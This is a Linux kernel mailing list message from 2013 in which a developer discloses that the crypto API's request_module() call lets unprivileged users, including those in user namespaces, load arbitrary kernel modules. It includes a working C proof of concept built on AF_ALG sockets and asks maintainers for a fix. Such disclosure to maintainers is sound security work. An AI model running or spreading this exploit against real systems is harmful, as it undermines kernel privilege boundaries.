From: Mathias Krause <minipli@googlemail.com>
To: Kees Cook <keescook@google.com>
Cc: "Serge E. Hallyn" <serge@hallyn.com>,
"Eric W. Biederman" <ebiederm@xmission.com>,
LKML <linux-kernel@vger.kernel.org>,
Serge Hallyn <serge.hallyn@canonical.com>,
Brad Spengler <spender@grsecurity.net>,
Al Viro <viro@zeniv.linux.org.uk>, Eric Paris <eparis@redhat.com>,
Rusty Russell <rusty@rustcorp.com.au>,
PaX Team <pageexec@freemail.hu>,
Herbert Xu <herbert@gondor.hengli.com.au>,
"David S. Miller" <davem@davemloft.net>
Subject: Re: user ns: arbitrary module loading
Date: Mon, 4 Mar 2013 09:29:59 +0100 [thread overview]
Message-ID: <20130304082959.GA22087@r00tworld.net> (raw)
In-Reply-To: <CAGXu5jKphNv9+wYE1GwfXKXDdzeWB_AtiqxT0e2PEzqCXNPkfQ@mail.gmail.com>
On Sun, Mar 03, 2013 at 09:48:50AM -0800, Kees Cook wrote:
> Several subsystems already have an implicit subsystem restriction
> because they load with aliases. (e.g. binfmt-XXXX, net-pf=NNN,
> snd-card-NNN, FOO-iosched, etc). This isn't the case for filesystems
> and a few others, unfortunately:
>
> $ git grep 'request_module("%.*s"' | grep -vi prefix
> crypto/api.c: request_module("%s", name);
>
> [...]
>
> Several of these come from hardcoded values, though (e.g. crypto, chipreg).
Well, crypto does not. Try the code snippet below on a system with
CONFIG_CRYPTO_USER_API=y. It'll abuse the above request_module() call
to load any module the user requests -- iregardless of being contained
in a user ns or not.
---8<---
/* Loading arbitrary modules using crypto api since v2.6.38
*
* - minipli
*/
#include <linux/if_alg.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#ifndef AF_ALG
#define AF_ALG 38
#endif
int main(int argc, char **argv) {
struct sockaddr_alg sa_alg = {
.salg_family = AF_ALG,
.salg_type = "hash",
};
int sock;
if (argc != 2) {
printf("usage: %s MODULE_NAME\n", argv[0]);
exit(1);
}
sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (sock < 0) {
perror("socket(AF_ALG)");
exit(1);
}
strncpy((char *) sa_alg.salg_name, argv[1], sizeof(sa_alg.salg_name));
bind(sock, (struct sockaddr *) &sa_alg, sizeof(sa_alg));
close(sock);
return 0;
}
--->8---
If people care about unprivileged users not being able to load arbitrary
modules, could someone please fix this in crypto API, then? Herbert?
Thanks,
Mathias
next prev parent reply other threads:[~2013-03-04 8:39 UTC|newest]
Thread overview: 35+ messages / expand[flat|nested] mbox.gz Atom feed top
2013-03-02 1:22 user ns: arbitrary module loading Kees Cook
2013-03-03 0:57 ` Serge E. Hallyn
2013-03-03 1:18 ` Kees Cook
2013-03-03 3:56 ` Serge E. Hallyn
2013-03-03 10:14 ` [RFC][PATCH] fs: Limit sys_mount to only loading filesystem modules Eric W. Biederman
2013-03-03 15:29 ` Serge E. Hallyn
2013-03-03 18:30 ` Kees Cook
2013-03-03 17:48 ` user ns: arbitrary module loading Kees Cook
2013-03-04 8:29 ` Mathias Krause [this message]
2013-03-04 16:46 ` Kees Cook
2013-03-04 18:21 ` Eric W. Biederman
2013-03-04 18:41 ` Kees Cook
2013-03-03 4:12 ` Eric W. Biederman
2013-03-03 18:18 ` Kees Cook
2013-03-03 21:58 ` Eric W. Biederman
2013-03-04 2:35 ` Kees Cook
2013-03-04 3:54 ` Eric W. Biederman
[not found] ` <CAGXu5jJiO=BmjVbpVJhxHbafn5T_SQbe5g-RLxRbmknNnQMyfQ-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
2013-03-04 7:48 ` [PATCH 0/2] userns bug fixes for v3.9-rc2 for review Eric W. Biederman
2013-03-04 7:48 ` Eric W. Biederman
[not found] ` <87k3pnmwpk.fsf_-_-aS9lmoZGLiVWk0Htik3J/w@public.gmane.org>
2013-03-04 7:50 ` [PATCH 1/2] userns: Stop oopsing in key_change_session_keyring Eric W. Biederman
2013-03-04 7:50 ` Eric W. Biederman
2013-03-04 7:51 ` [PATCH 2/2] fs: Limit sys_mount to only request filesystem modules Eric W. Biederman
2013-03-04 7:51 ` Eric W. Biederman
[not found] ` <878v63mwm3.fsf_-_-aS9lmoZGLiVWk0Htik3J/w@public.gmane.org>
2013-03-04 17:36 ` Vasily Kulikov
2013-03-04 17:36 ` Vasily Kulikov
2013-03-04 17:36 ` [kernel-hardening] " Vasily Kulikov
2013-03-04 18:36 ` Eric W. Biederman
2013-03-04 18:36 ` Eric W. Biederman
2013-03-04 18:36 ` Eric W. Biederman
2013-03-05 19:06 ` Kay Sievers
2013-03-05 19:06 ` Kay Sievers
[not found] ` <CAPXgP11AB7=2oeXtxb0so4a8hms7-_UWJDVE=6kndU062tGycQ-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
2013-03-05 19:32 ` Kees Cook
2013-03-05 19:32 ` Kees Cook
2013-03-05 23:24 ` Eric W. Biederman
2013-03-05 23:24 ` Eric W. Biederman
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20130304082959.GA22087@r00tworld.net \
--to=minipli@googlemail.com \
--cc=davem@davemloft.net \
--cc=ebiederm@xmission.com \
--cc=eparis@redhat.com \
--cc=herbert@gondor.hengli.com.au \
--cc=keescook@google.com \
--cc=linux-kernel@vger.kernel.org \
--cc=pageexec@freemail.hu \
--cc=rusty@rustcorp.com.au \
--cc=serge.hallyn@canonical.com \
--cc=serge@hallyn.com \
--cc=spender@grsecurity.net \
--cc=viro@zeniv.linux.org.uk \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.